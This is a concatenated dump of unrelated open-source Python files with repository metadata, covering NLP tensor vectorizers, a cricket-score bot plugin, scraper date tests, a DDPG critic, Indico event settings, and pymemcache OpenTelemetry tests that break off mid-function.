if logger.isEnabledFor(logging.DEBUG):
logger.debug(f'encoded shape: {arr.shape}')
return SparseTensorFeatureContext.instance(
self.feature_id, arr, self.torch_config)
def _slice_by_attributes(self, arr: Tensor) -> Tensor:
"""Create a new tensor from column based slices of the encoded tensor for each
specified feature id given in :obj:`decoded_feature_ids`.
"""
keeps = set(self.decoded_feature_ids)
col_start = 0
tensors = []
for fvec in self.manager.spacy_vectorizers.values():
col_end = col_start + fvec.shape[1]
fid = fvec.feature_id
if logger.isEnabledFor(logging.DEBUG):
logger.debug(f'type={fid}, to keep={keeps}')
if fid in keeps:
keep_vec = arr[:, col_start:col_end]
tensors.append(keep_vec)
keeps.remove(fid)
col_start = col_end
if len(keeps) > 0:
raise VectorizerError(f'Unknown feature type IDs: {keeps}')
sarr = torch.cat(tensors, dim=1)
if logger.isEnabledFor(logging.DEBUG):
logger.debug(f'slice dim: {sarr.shape}')
return sarr
def to_symbols(self, tensor: Tensor) -> List[Dict[str, float]]:
"""Reverse map the tensor to spaCy features.
:return: a list of sentences, each a map of name/count pairs.
"""
sents = []
for six in range(tensor.size(0)):
col_start = 0
by_fid = {}
sents.append(by_fid)
arr = tensor[six]
for fvec in self.manager.spacy_vectorizers.values():
col_end = col_start + fvec.shape[1]
fid = fvec.feature_id
vec = arr[col_start:col_end]
cnts = dict(filter(lambda x: x[1] > 0,
zip(fvec.as_list, vec.tolist())))
by_fid[fid] = cnts
col_start = col_end
return sents
def _decode(self, context: FeatureContext) -> Tensor:
arr = super()._decode(context)
if logger.isEnabledFor(logging.DEBUG):
logger.debug(f'decoded features: {self.decoded_feature_ids}, ' +
f'shape: {arr.shape}')
if self.decoded_feature_ids is not None:
arr = self._slice_by_attributes(arr)
if logger.isEnabledFor(logging.DEBUG):
logger.debug(f'decoded shape: {arr.shape}')
return arr
@dataclass
class DepthFeatureDocumentVectorizer(FeatureDocumentVectorizer):
"""Generate the depths of tokens based on how deep they are in a head
dependency tree.
Even though this is a document level vectorizer and is usually added in a
join layer rather than stacked on to the embedded layer, it still assumes
congruence with the token length, which is used in its shape.
**Important**: do not combine sentences in to a single document with
:meth:`FeatureDocument.combine_sentences` since features are created as a
dependency parse tree at the sentence level. Otherwise, the dependency
relations are broken and results in a zeored tensor.
:shape: (|sentences|, token length, 1)
"""
DESCRIPTION = 'head depth'
FEATURE_TYPE = TextFeatureType.TOKEN
def _get_shape(self) -> Tuple[int, int]:
return -1, self.token_length, 1
def encode(self, doc: Union[Tuple[FeatureDocument], FeatureDocument]) -> \
FeatureContext:
ctx: TensorFeatureContext
if isinstance(doc, (tuple, list)):
self._assert_doc(doc)
docs = doc
comb_doc = FeatureDocument.combine_documents(docs)
n_toks = self.manager.get_token_length(comb_doc)
arrs = tuple(map(lambda d:
self._encode_doc(d.combine_sentences(), n_toks),
docs))
arr = torch.cat(arrs, dim=0)
arr = arr.unsqueeze(-1)
ctx = SparseTensorFeatureContext.instance(
self.feature_id, arr, self.torch_config)
else:
ctx = super().encode(doc)
return ctx
def _encode(self, doc: FeatureDocument) -> FeatureContext:
n_toks = self.manager.get_token_length(doc)
arr = self._encode_doc(doc, n_toks)
arr = arr.unsqueeze(-1)
return SparseTensorFeatureContext.instance(
self.feature_id, arr, self.torch_config)
def _encode_doc(self, doc: FeatureDocument, n_toks: int) -> Tensor:
n_sents = len(doc.sents)
arr = self.torch_config.zeros((n_sents, n_toks))
u_doc = doc.uncombine_sentences()
if logger.isEnabledFor(logging.DEBUG):
logger.debug(f'encoding doc: {len(doc)}/{len(u_doc)}: {doc}')
# if the doc is combined as several sentences concatenated in one, un
# pack and write all features in one row
if len(doc) != len(u_doc):
soff = 0
for sent in u_doc.sents:
self._transform_sent(sent, arr, 0, soff, n_toks)
soff += len(sent)
else:
# otherwise, each row is a separate sentence
for six, sent in enumerate(doc.sents):
self._transform_sent(sent, arr, six, 0, n_toks)
if logger.isEnabledFor(logging.DEBUG):
logger.debug(f'encoded shape: {arr.shape}')
return arr
def _transform_sent(self, sent: FeatureSentence, arr: Tensor,
six: int, soff: int, slen: int):
head_depths = self._get_head_depth(sent)
for tix, tok, depth in head_depths:
off = tix + soff
val = 1. / depth
in_range = (off < slen)
if logger.isEnabledFor(logging.DEBUG):
logger.debug(f'setting ({six}, {off}) = {val}: set={in_range}')
if in_range:
arr[six, off] = val
def _dep_branch(self, node: FeatureToken, toks: Tuple[FeatureToken],
tid_to_idx: Dict[int, int], depth: int,
depths: Dict[int, int]) -> \
Dict[FeatureToken, List[FeatureToken]]:
idx = tid_to_idx.get(node.i)
if idx is not None:
depths[idx] = depth
for c in node.children:
cix = tid_to_idx.get(c)
if cix is not None:
child = toks[cix]
self._dep_branch(child, toks, tid_to_idx, depth + 1, depths)
def _get_head_depth(self, sent: FeatureSentence) -> \
Tuple[Tuple[int, FeatureToken, int]]:
"""Calculate the depth of tokens in a sentence.
:param sent: the sentence that has the tokens to get depts
:return: a tuple of (sentence token index, token, depth)
"""
tid_to_idx: Dict[int, int] = {}
toks = sent.tokens
for i, tok in enumerate(toks):
tid_to_idx[tok.i] = i
if logger.isEnabledFor(logging.DEBUG):
logger.debug('|'.join(
map(lambda t: f'{tid_to_idx[t.i]}:{t.i}:{t.text}({t.dep_})',
sent.token_iter())))
logger.debug(f'tree: {sent.dependency_tree}')
if logger.isEnabledFor(logging.DEBUG):
logger.debug(f'tokens: {toks}')
root = tuple(
filter(lambda t: t.dep_ == 'ROOT' and not t.is_punctuation, toks))
if len(root) == 1:
root = root[0]
tree = {tid_to_idx[root.i]: 0}
self._dep_branch(root, toks, tid_to_idx, 1, tree)
return map(lambda x: (x[0], toks[x[0]], x[1]), tree.items())
else:
return ()
@dataclass
class OneHotEncodedFeatureDocumentVectorizer(
FeatureDocumentVectorizer, OneHotEncodedEncodableFeatureVectorizer):
"""Vectorize nominal enumerated features in to a one-hot encoded vectors. The
feature is taken another vectorizer indicated by the feature ID specified
with the :obj:`feature_id`.
:shape: (-1, |token length|, |categories|)
"""
DESCRIPTION = 'encoded feature document vectorizer'
FEATURE_TYPE = TextFeatureType.TOKEN
feature_attribute: Tuple[str] = field(default=None)
"""The feature attributes to vectorize."""
def __post_init__(self):
super().__post_init__()
self.optimize_bools = False
def _get_shape(self) -> Tuple[int, int]:
return -1, self.token_length, super()._get_shape()[1]
def _encode(self, doc: FeatureDocument) -> FeatureContext:
slen = len(doc)
tlen = self.manager.get_token_length(doc)
attr = self.feature_attribute
arr = self.torch_config.zeros((slen, tlen, self.shape[2]))
if logger.isEnabledFor(logging.DEBUG):
logger.debug(f'vectorizing: {attr} for token length: {tlen} ' +
f'in to {arr.shape}')
for six, sent in enumerate(doc.sents):
feats = tuple(map(lambda s: getattr(s, attr), sent))
self._encode_cats(feats, arr[six])
if logger.isEnabledFor(logging.DEBUG):
logger.debug(f'vectorized: {len(doc)} sents in to {arr.shape}')
return SparseTensorFeatureContext.instance(
self.feature_id, arr, self.torch_config)
@dataclass
class StatisticsFeatureDocumentVectorizer(FeatureDocumentVectorizer):
"""Vectorizes basic surface language statics which include:
* character count
* token count
* min token length in characters
* max token length in characters
* average token length in characters (|characters| / |tokens|)
* sentence count (for FeatureDocuments)
* average sentence length (|tokens| / |sentences|)
* min sentence length
* max sentence length
:shape: (9,)
"""
DESCRIPTION = 'statistics'
FEATURE_TYPE = TextFeatureType.DOCUMENT
def _get_shape(self) -> Tuple[int, int]:
return -1, 9
def _encode(self, doc: FeatureDocument) -> FeatureContext:
n_toks = len(doc.tokens)
n_sents = 1
min_tlen = sys.maxsize
max_tlen = 0
ave_tlen = 1
min_slen = sys.maxsize
max_slen = 0
ave_slen = 1
n_char = 0
for t in doc.tokens:
tlen = len(t.norm)
n_char += tlen
min_tlen = min(min_tlen, tlen)
max_tlen = max(max_tlen, tlen)
ave_tlen = n_char / n_toks
if isinstance(doc, FeatureDocument):
n_sents = len(doc.sents)
ave_slen = n_toks / n_sents
for s in doc.sents:
slen = len(s.tokens)
min_slen = min(min_slen, slen)
max_slen = max(max_slen, slen)
stats = (n_char, n_toks, min_tlen, max_tlen, ave_tlen,
n_sents, ave_slen, min_slen, max_slen)
arr = self.torch_config.from_iterable(stats).unsqueeze(0)
if logger.isEnabledFor(logging.DEBUG):
logger.debug(f'array shape: {arr.shape}')
return TensorFeatureContext(self.feature_id, arr)
@dataclass
class OverlappingFeatureDocumentVectorizer(MultiDocumentVectorizer):
"""Vectorize the number of normalized and lemmatized tokens (in this order)
across multiple documents.
The input to this feature vectorizer are a tuple N of
:class:`.FeatureDocument` instances.
:shape: (2,)
"""
DESCRIPTION = 'overlapping token counts'
def _get_shape(self) -> Tuple[int, int]:
return 2,
@staticmethod
def _norms(ac: TokensContainer, bc: TokensContainer) -> Tuple[int]:
a = set(map(lambda s: s.norm.lower(), ac.token_iter()))
b = set(map(lambda s: s.norm.lower(), bc.token_iter()))
return a & b
@staticmethod
def _lemmas(ac: TokensContainer, bc: TokensContainer) -> Tuple[int]:
a = set(map(lambda s: s.lemma_.lower(), ac.token_iter()))
b = set(map(lambda s: s.lemma_.lower(), bc.token_iter()))
return a & b
def _encode(self, docs: Tuple[FeatureDocument]) -> FeatureContext:
norms = reduce(self._norms, docs)
lemmas = reduce(self._lemmas, docs)
arr = self.torch_config.from_iterable((len(norms), len(lemmas)))
return TensorFeatureContext(self.feature_id, arr)
@dataclass
class MutualFeaturesContainerFeatureVectorizer(MultiDocumentVectorizer):
"""Vectorize the shared count of all tokens as a S X M * N tensor, where S is
the number of sentences, M is the number of token feature ids and N is the
columns of the output of the :class:`.SpacyFeatureVectorizer` vectorizer.
This uses an instance of :class:`CountEnumContainerFeatureVectorizer` to
compute across each spacy feature and then sums them up for only those
features shared. If at least one shared document has a zero count, the
features is zeroed.
The input to this feature vectorizer are a tuple of N
:class:`.TokenContainer` instances.
:shape: (|sentences|, |decoded features|,) from the referenced
:class:`CountEnumContainerFeatureVectorizer` given by
:obj:`count_vectorizer_feature_id`
"""
DESCRIPTION = 'mutual feature counts'
count_vectorizer_feature_id: str = field()
"""The string feature ID configured in the
:class:`.FeatureDocumentVectorizerManager` of the
:class:`CountEnumContainerFeatureVectorizer` to use for the count features.
"""
@property
def count_vectorizer(self) -> CountEnumContainerFeatureVectorizer:
"""Return the count vectorizer used for the count features.
:see: :obj:`count_vectorizer_feature_id`
"""
return self.manager[self.count_vectorizer_feature_id]
@property
def ones(self) -> Tensor:
"""Return a tensor of ones for the shape of this instance.
"""
return self.torch_config.ones((1, self.shape[1]))
def _get_shape(self) -> Tuple[int, int]:
return -1, self.count_vectorizer.shape[1]
def _encode(self, docs: Tuple[FeatureDocument]) -> FeatureContext:
ctxs = tuple(map(self.count_vectorizer.encode,
map(lambda doc: doc.combine_sentences(), docs)))
return MultiFeatureContext(self.feature_id, ctxs)
def _decode(self, context: MultiFeatureContext) -> Tensor:
def decode_context(ctx):
sents = self.count_vectorizer.decode(ctx)
return torch.sum(sents, axis=0)
ones = self.ones
arrs = tuple(map(decode_context, context.contexts))
if len(arrs) == 1:
# return the single document as a mutual count against itself
return arrs[0]
else:
arrs = torch.stack(arrs, axis=0).squeeze(1)
if logger.isEnabledFor(logging.DEBUG):
logger.debug(f'combined counts (doc/row): {arrs.shape}')
# clone so the operations of this vectorizer do not effect the
# tensors from the delegate count vectorizer
cnts = self.torch_config.clone(arrs)
# multiple counts of all docs so any 0 count feature will be 0 in
# the mask
prod = cnts.prod(axis=0).unsqueeze(0)
# create 2 X N with count product with ones
cat_ones = torch.cat((prod, ones))
# keep 0s for no count features or 1 if there is at least one for
# the mask
mask = torch.min(cat_ones, axis=0)[0]
if logger.isEnabledFor(logging.DEBUG):
logger.debug(f'counts mask: {cat_ones.shape}')
# use the mask to zero out counts that aren't mutual across all
# documents, then sum the counts across docuemnts
return (cnts * mask).sum(axis=0).unsqueeze(0)
| 39.567976
| 86
| 0.620142
|
794da1cebeb62c155689d7ab16bc98a69236d34e
| 819
|
py
|
Python
|
plugins/cricket.py
|
TeamIndianUserBot/Andencento
|
f7a4cbc8a6d5c359d04acbd5bac8c8745a5f8162
|
[
"CC0-1.0"
] | 2
|
2021-12-14T06:15:31.000Z
|
2021-12-14T12:46:04.000Z
|
plugins/cricket.py
|
Hobby-Dev-0/Andencento-1
|
2b3a01439666093445b5fa3d66cede877098fcb9
|
[
"CC0-1.0"
] | null | null | null |
plugins/cricket.py
|
Hobby-Dev-0/Andencento-1
|
2b3a01439666093445b5fa3d66cede877098fcb9
|
[
"CC0-1.0"
] | 1
|
2021-08-30T09:26:23.000Z
|
2021-08-30T09:26:23.000Z
|
import urllib.request
from bs4 import BeautifulSoup
from . import *
@Andencento.on(andencento_cmd(pattern="cs$"))
@Andencento.on(sudo_cmd(pattern="cs$", allow_sudo=True))
async def _(event):
if event.fwd_from:
return
score_page = "http://static.cricinfo.com/rss/livescores.xml"
page = urllib.request.urlopen(score_page)
soup = BeautifulSoup(page, "html.parser")
result = soup.find_all("description")
Sed = ""
for match in result:
Sed += match.get_text() + "\n\n"
await event.edit(
f"<b><u>Match information gathered successful</b></u>\n\n\n<code>{Sed}</code>",
parse_mode="HTML",
)
CmdHelp("cricket").add_command(
"cs", None, "Collects all the live cricket scores."
).add_info("Cricket Kheloge Vro?").add_warning("✅ Harmless Module.").add()
| 28.241379
| 87
| 0.661783
|
794da3eb95cf7b1b271cc3bbdba4b7f96af9b993
| 2,326
|
py
|
Python
|
tests/mal_scraper/test_mal_utils.py
|
QasimK/mal-scraper
|
2657be490c80fe695da2e774aea1602846aeb207
|
[
"MIT"
] | 17
|
2016-10-16T16:19:14.000Z
|
2022-02-11T07:46:43.000Z
|
tests/mal_scraper/test_mal_utils.py
|
QasimK/mal-scraper
|
2657be490c80fe695da2e774aea1602846aeb207
|
[
"MIT"
] | 20
|
2016-05-15T19:06:59.000Z
|
2021-06-01T21:59:28.000Z
|
tests/mal_scraper/test_mal_utils.py
|
QasimK/mal-scraper
|
2657be490c80fe695da2e774aea1602846aeb207
|
[
"MIT"
] | 11
|
2017-08-06T07:29:09.000Z
|
2022-02-07T17:03:54.000Z
|
from datetime import date, datetime, timedelta
import pytest
from mal_scraper import mal_utils
class TestGetDatetime(object):
nowish = datetime.utcnow()
yesterdayish = nowish - timedelta(days=1)
@pytest.mark.parametrize('text,expected_datetime', [
('Now', datetime.utcnow()),
('Oct 1, 2013 11:04 PM', datetime(year=2013, month=10, day=1, hour=23, minute=4)),
('Oct 1, 4:29 AM', datetime(year=nowish.year, month=10, day=1, hour=4, minute=29)),
('Yesterday, 9:58 AM', yesterdayish.replace(hour=9, minute=58)),
('Today, 1:22 AM', nowish.replace(hour=1, minute=22)),
('4 hours ago', nowish - timedelta(hours=4)),
('1 hour ago', nowish - timedelta(hours=1)),
('12 minutes ago', nowish - timedelta(minutes=12)),
('1 minute ago', nowish - timedelta(minutes=1)),
('Now', nowish),
])
def test_get_datetime(self, text, expected_datetime):
assert (expected_datetime - mal_utils.get_datetime(text)) < timedelta(minutes=1)
time_difference = mal_utils.get_datetime(text, self.nowish) - mal_utils.get_datetime(text)
assert time_difference < timedelta(minutes=1)
@pytest.mark.parametrize('text,expected_datetime', [
('Now', yesterdayish),
('Oct 1, 2013 11:04 PM', datetime(year=2013, month=9, day=30, hour=23, minute=4)),
('Oct 1, 4:29 AM', datetime(year=nowish.year, month=9, day=30, hour=4, minute=29)),
('Yesterday, 9:58 AM', yesterdayish.replace(hour=9, minute=58) - timedelta(days=1)),
('Today, 1:22 AM', yesterdayish.replace(hour=1, minute=22)),
('4 hours ago', yesterdayish - timedelta(hours=4)),
('1 hour ago', yesterdayish - timedelta(hours=1)),
('12 minutes ago', yesterdayish - timedelta(minutes=12)),
('1 minute ago', yesterdayish - timedelta(minutes=1)),
('Now', yesterdayish),
])
def test_get_datetime_relative_to_yesterday(self, text, expected_datetime):
time_difference = expected_datetime - mal_utils.get_datetime(text, self.yesterdayish)
assert time_difference < timedelta(minutes=1)
@pytest.mark.parametrize('text,expected_date', [
('Apr 3, 1998', date(year=1998, month=4, day=3))
])
def test_get_date(text, expected_date):
assert expected_date == mal_utils.get_date(text)
| 43.886792
| 98
| 0.654772
|
794da437ac98e144b5c50b10d4f26b6288407928
| 336
|
py
|
Python
|
brl_baselines/qmdp_ddpg/models.py
|
gilwoolee/brl_baselines
|
c85df28c0f2dfbd69d3d27928bcbabf36a3663bb
|
[
"BSD-3-Clause"
] | null | null | null |
brl_baselines/qmdp_ddpg/models.py
|
gilwoolee/brl_baselines
|
c85df28c0f2dfbd69d3d27928bcbabf36a3663bb
|
[
"BSD-3-Clause"
] | null | null | null |
brl_baselines/qmdp_ddpg/models.py
|
gilwoolee/brl_baselines
|
c85df28c0f2dfbd69d3d27928bcbabf36a3663bb
|
[
"BSD-3-Clause"
] | null | null | null |
import tensorflow as tf
from baselines.common.models import get_network_builder
from baselines.ddpg.models import Critic, Model
class PretrainableCritic(Model):
def __init__(self, name='critic', network='mlp', **network_kwargs):
super().__init__(name=name, network=network, **network_kwargs)
self.layer_norm = True
| 37.333333
| 71
| 0.755952
|
794da486a5b1af44c2de5f729dca6317ea8a8f80
| 6,613
|
py
|
Python
|
indico/modules/events/management/controllers/settings.py
|
jgrigera/indico
|
b5538f2755bc38a02313d079bac831ee3dfb44ab
|
[
"MIT"
] | 1
|
2018-11-12T21:29:26.000Z
|
2018-11-12T21:29:26.000Z
|
indico/modules/events/management/controllers/settings.py
|
jgrigera/indico
|
b5538f2755bc38a02313d079bac831ee3dfb44ab
|
[
"MIT"
] | 9
|
2020-09-08T09:25:57.000Z
|
2022-01-13T02:59:05.000Z
|
indico/modules/events/management/controllers/settings.py
|
jgrigera/indico
|
b5538f2755bc38a02313d079bac831ee3dfb44ab
|
[
"MIT"
] | 3
|
2020-07-20T09:09:44.000Z
|
2020-10-19T00:29:49.000Z
|
# This file is part of Indico.
# Copyright (C) 2002 - 2020 CERN
#
# Indico is free software; you can redistribute it and/or
# modify it under the terms of the MIT License; see the
# LICENSE file for more details.
from __future__ import unicode_literals
from flask import redirect, session
from werkzeug.exceptions import Forbidden
from indico.core import signals
from indico.core.config import config
from indico.core.db import db
from indico.core.db.sqlalchemy.util.queries import db_dates_overlap
from indico.modules.events.management.controllers.base import RHManageEventBase
from indico.modules.events.management.forms import (EventClassificationForm, EventContactInfoForm, EventDataForm,
EventDatesForm, EventLocationForm, EventPersonsForm)
from indico.modules.events.management.util import flash_if_unregistered
from indico.modules.events.management.views import WPEventSettings, render_event_management_header_right
from indico.modules.events.models.labels import EventLabel
from indico.modules.events.models.references import ReferenceType
from indico.modules.events.operations import update_event
from indico.modules.events.util import track_time_changes
from indico.modules.rb.models.reservation_occurrences import ReservationOccurrence
from indico.modules.rb.models.reservations import Reservation
from indico.modules.rb.models.rooms import Room
from indico.util.signals import values_from_signal
from indico.web.flask.templating import get_template_module
from indico.web.forms.base import FormDefaults
from indico.web.util import jsonify_data, jsonify_form, jsonify_template
class RHEventSettings(RHManageEventBase):
"""Event settings dashboard"""
def _check_access(self):
if not session.user:
raise Forbidden
# If the user cannot manage the whole event see if anything gives them
# limited management access.
if not self.event.can_manage(session.user):
urls = sorted(values_from_signal(signals.event_management.management_url.send(self.event),
single_value=True))
response = redirect(urls[0]) if urls else None
raise Forbidden(response=response)
RHManageEventBase._check_access(self) # mainly to trigger the legacy "event locked" check
def _process(self):
show_booking_warning = False
if (config.ENABLE_ROOMBOOKING and not self.event.has_ended and self.event.room
and not self.event.room_reservation_links):
# Check if any of the managers of the event already have a booking that overlaps with the event datetime
manager_ids = [p.user.id for p in self.event.acl_entries if p.user]
has_overlap = (ReservationOccurrence.query
.filter(ReservationOccurrence.is_valid,
db.or_(Reservation.booked_for_id.in_(manager_ids),
Reservation.created_by_id.in_(manager_ids)),
db_dates_overlap(ReservationOccurrence,
'start_dt', self.event.start_dt_local,
'end_dt', self.event.end_dt_local),
Reservation.room_id == self.event.room.id,
~Room.is_deleted)
.join(Reservation)
.join(Room)
.has_rows())
show_booking_warning = not has_overlap
has_reference_types = ReferenceType.query.has_rows()
has_event_labels = EventLabel.query.has_rows()
return WPEventSettings.render_template('settings.html', self.event, 'settings',
show_booking_warning=show_booking_warning,
has_reference_types=has_reference_types,
has_event_labels=has_event_labels)
class RHEditEventDataBase(RHManageEventBase):
form_class = None
section_name = None
def render_form(self, form):
return jsonify_form(form, footer_align_right=True)
def render_settings_box(self):
tpl = get_template_module('events/management/_settings.html')
assert self.section_name
has_reference_types = ReferenceType.query.has_rows()
has_event_labels = EventLabel.query.has_rows()
return tpl.render_event_settings(self.event, has_reference_types, has_event_labels,
section=self.section_name, with_container=False)
def jsonify_success(self):
return jsonify_data(settings_box=self.render_settings_box(),
right_header=render_event_management_header_right(self.event))
def _process(self):
form = self.form_class(obj=self.event, event=self.event)
if form.validate_on_submit():
with flash_if_unregistered(self.event, lambda: self.event.person_links):
update_event(self.event, **form.data)
return self.jsonify_success()
self.commit = False
return self.render_form(form)
class RHEditEventData(RHEditEventDataBase):
form_class = EventDataForm
section_name = 'data'
class RHEditEventLocation(RHEditEventDataBase):
form_class = EventLocationForm
section_name = 'location'
class RHEditEventPersons(RHEditEventDataBase):
form_class = EventPersonsForm
section_name = 'persons'
class RHEditEventContactInfo(RHEditEventDataBase):
form_class = EventContactInfoForm
section_name = 'contact_info'
def render_form(self, form):
return jsonify_template('events/management/event_contact_info.html', form=form)
class RHEditEventClassification(RHEditEventDataBase):
form_class = EventClassificationForm
section_name = 'classification'
class RHEditEventDates(RHEditEventDataBase):
section_name = 'dates'
def _process(self):
defaults = FormDefaults(self.event, update_timetable=True)
form = EventDatesForm(obj=defaults, event=self.event)
if form.validate_on_submit():
with track_time_changes():
update_event(self.event, **form.data)
return self.jsonify_success()
show_screen_dates = form.has_displayed_dates and (form.start_dt_override.data or form.end_dt_override.data)
return jsonify_template('events/management/event_dates.html', form=form, show_screen_dates=show_screen_dates)
| 44.986395
| 117
| 0.683956
|
794da53f7f918ffd128d0cb789377a770123133a
| 174
|
py
|
Python
|
VSR/Backend/Torch/Framework/__init__.py
|
Kadantte/VideoSuperResolution
|
4c86e49d81c7a9bea1fe0780d651afc126768df3
|
[
"MIT"
] | 1,447
|
2018-06-04T08:44:07.000Z
|
2022-03-29T06:19:10.000Z
|
VSR/Backend/Torch/Framework/__init__.py
|
AbdulMoqeet/VideoSuperResolution
|
82c3347554561ff9dfb5e86d9cf0a55239ca662e
|
[
"MIT"
] | 96
|
2018-08-29T01:02:45.000Z
|
2022-01-12T06:00:01.000Z
|
VSR/Backend/Torch/Framework/__init__.py
|
AbdulMoqeet/VideoSuperResolution
|
82c3347554561ff9dfb5e86d9cf0a55239ca662e
|
[
"MIT"
] | 307
|
2018-06-26T13:35:54.000Z
|
2022-01-21T09:01:54.000Z
|
# Copyright (c) 2017-2020 Wenyi Tang.
# Author: Wenyi Tang
# Email: wenyitang@outlook.com
# Update: 2020 - 2 - 7
__all__ = [
'Environment',
'Summary',
'Trainer'
]
| 15.818182
| 38
| 0.632184
|
794da6d9e7c9bd55147f0996c0b51b7bb9cec19b
| 165
|
py
|
Python
|
faebryk/__init__.py
|
NoR8quoh1r/faebryk
|
9d0b2c20bc933d18f2f7124e69032fe308ab41bc
|
[
"MIT"
] | null | null | null |
faebryk/__init__.py
|
NoR8quoh1r/faebryk
|
9d0b2c20bc933d18f2f7124e69032fe308ab41bc
|
[
"MIT"
] | null | null | null |
faebryk/__init__.py
|
NoR8quoh1r/faebryk
|
9d0b2c20bc933d18f2f7124e69032fe308ab41bc
|
[
"MIT"
] | null | null | null |
# This file is part of the faebryk project
# SPDX-License-Identifier: MIT
import faebryk.exporters
import faebryk.libs
import faebryk.library
import faebryk.version
| 23.571429
| 42
| 0.824242
|
794da9972be25bd22bee5901b20d4324d6b15699
| 17,007
|
py
|
Python
|
instrumentation/opentelemetry-instrumentation-pymemcache/tests/test_pymemcache.py
|
LetzNico/opentelemetry-python
|
b565d6b643f175faee3f57ef81c8b7edbf50ec41
|
[
"Apache-2.0"
] | null | null | null |
instrumentation/opentelemetry-instrumentation-pymemcache/tests/test_pymemcache.py
|
LetzNico/opentelemetry-python
|
b565d6b643f175faee3f57ef81c8b7edbf50ec41
|
[
"Apache-2.0"
] | null | null | null |
instrumentation/opentelemetry-instrumentation-pymemcache/tests/test_pymemcache.py
|
LetzNico/opentelemetry-python
|
b565d6b643f175faee3f57ef81c8b7edbf50ec41
|
[
"Apache-2.0"
] | null | null | null |
# Copyright The OpenTelemetry Authors
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import pymemcache
from pymemcache.exceptions import (
MemcacheClientError,
MemcacheIllegalInputError,
MemcacheServerError,
MemcacheUnknownCommandError,
MemcacheUnknownError,
)
from opentelemetry import trace as trace_api
from opentelemetry.instrumentation.pymemcache import PymemcacheInstrumentor
from opentelemetry.test.test_base import TestBase
from opentelemetry.trace import get_tracer
from opentelemetry.trace.status import StatusCanonicalCode
from .utils import MockSocket, _str
TEST_HOST = "localhost"
TEST_PORT = 117711
class PymemcacheClientTestCase(
TestBase
): # pylint: disable=too-many-public-methods
""" Tests for a patched pymemcache.client.base.Client. """
def setUp(self):
super().setUp()
PymemcacheInstrumentor().instrument()
# pylint: disable=protected-access
self.tracer = get_tracer(__name__)
def tearDown(self):
super().tearDown()
PymemcacheInstrumentor().uninstrument()
def make_client(self, mock_socket_values, **kwargs):
# pylint: disable=attribute-defined-outside-init
self.client = pymemcache.client.base.Client(
(TEST_HOST, TEST_PORT), **kwargs
)
self.client.sock = MockSocket(list(mock_socket_values))
return self.client
def check_spans(self, spans, num_expected, queries_expected):
"""A helper for validating basic span information."""
self.assertEqual(num_expected, len(spans))
for span, query in zip(spans, queries_expected):
self.assertEqual(span.name, "memcached.command")
self.assertIs(span.kind, trace_api.SpanKind.INTERNAL)
self.assertEqual(
span.attributes["net.peer.name"], "{}".format(TEST_HOST)
)
self.assertEqual(span.attributes["net.peer.port"], TEST_PORT)
self.assertEqual(span.attributes["db.type"], "memcached")
self.assertEqual(
span.attributes["db.url"],
"memcached://{}:{}".format(TEST_HOST, TEST_PORT),
)
self.assertEqual(span.attributes["db.statement"], query)
def test_set_success(self):
client = self.make_client([b"STORED\r\n"])
result = client.set(b"key", b"value", noreply=False)
self.assertTrue(result)
spans = self.memory_exporter.get_finished_spans()
self.check_spans(spans, 1, ["set key"])
def test_get_many_none_found(self):
client = self.make_client([b"END\r\n"])
result = client.get_many([b"key1", b"key2"])
assert result == {}
spans = self.memory_exporter.get_finished_spans()
self.check_spans(spans, 1, ["get_many key1 key2"])
def test_get_multi_none_found(self):
client = self.make_client([b"END\r\n"])
# alias for get_many
result = client.get_multi([b"key1", b"key2"])
assert result == {}
spans = self.memory_exporter.get_finished_spans()
self.check_spans(spans, 1, ["get_multi key1 key2"])
def test_set_multi_success(self):
client = self.make_client([b"STORED\r\n"])
# Alias for set_many, a convienance function that calls set for every key
result = client.set_multi({b"key": b"value"}, noreply=False)
self.assertTrue(result)
spans = self.memory_exporter.get_finished_spans()
self.check_spans(spans, 2, ["set key", "set_multi key"])
def test_delete_not_found(self):
client = self.make_client([b"NOT_FOUND\r\n"])
result = client.delete(b"key", noreply=False)
assert result is False
spans = self.memory_exporter.get_finished_spans()
self.check_spans(spans, 1, ["delete key"])
def test_incr_found(self):
client = self.make_client([b"STORED\r\n", b"1\r\n"])
client.set(b"key", 0, noreply=False)
result = client.incr(b"key", 1, noreply=False)
assert result == 1
spans = self.memory_exporter.get_finished_spans()
self.check_spans(spans, 2, ["set key", "incr key"])
def test_get_found(self):
client = self.make_client(
[b"STORED\r\n", b"VALUE key 0 5\r\nvalue\r\nEND\r\n"]
)
result = client.set(b"key", b"value", noreply=False)
result = client.get(b"key")
assert result == b"value"
spans = self.memory_exporter.get_finished_spans()
self.check_spans(spans, 2, ["set key", "get key"])
def test_decr_found(self):
client = self.make_client([b"STORED\r\n", b"1\r\n"])
client.set(b"key", 2, noreply=False)
result = client.decr(b"key", 1, noreply=False)
assert result == 1
spans = self.memory_exporter.get_finished_spans()
self.check_spans(spans, 2, ["set key", "decr key"])
def test_add_stored(self):
client = self.make_client([b"STORED\r", b"\n"])
result = client.add(b"key", b"value", noreply=False)
self.assertTrue(result)
spans = self.memory_exporter.get_finished_spans()
self.check_spans(spans, 1, ["add key"])
def test_delete_many_found(self):
client = self.make_client([b"STORED\r", b"\n", b"DELETED\r\n"])
result = client.add(b"key", b"value", noreply=False)
# a convienance function that calls delete for every key
result = client.delete_many([b"key"], noreply=False)
self.assertTrue(result)
spans = self.memory_exporter.get_finished_spans()
self.check_spans(
spans, 3, ["add key", "delete key", "delete_many key"]
)
def test_set_many_success(self):
client = self.make_client([b"STORED\r\n"])
# a convienance function that calls set for every key
result = client.set_many({b"key": b"value"}, noreply=False)
self.assertTrue(result)
spans = self.memory_exporter.get_finished_spans()
self.check_spans(spans, 2, ["set key", "set_many key"])
def test_set_get(self):
client = self.make_client(
[b"STORED\r\n", b"VALUE key 0 5\r\nvalue\r\nEND\r\n"]
)
client.set(b"key", b"value", noreply=False)
result = client.get(b"key")
assert _str(result) == "value"
spans = self.memory_exporter.get_finished_spans()
self.assertEqual(len(spans), 2)
self.assertEqual(
spans[0].attributes["db.url"],
"memcached://{}:{}".format(TEST_HOST, TEST_PORT),
)
def test_append_stored(self):
client = self.make_client([b"STORED\r\n"])
result = client.append(b"key", b"value", noreply=False)
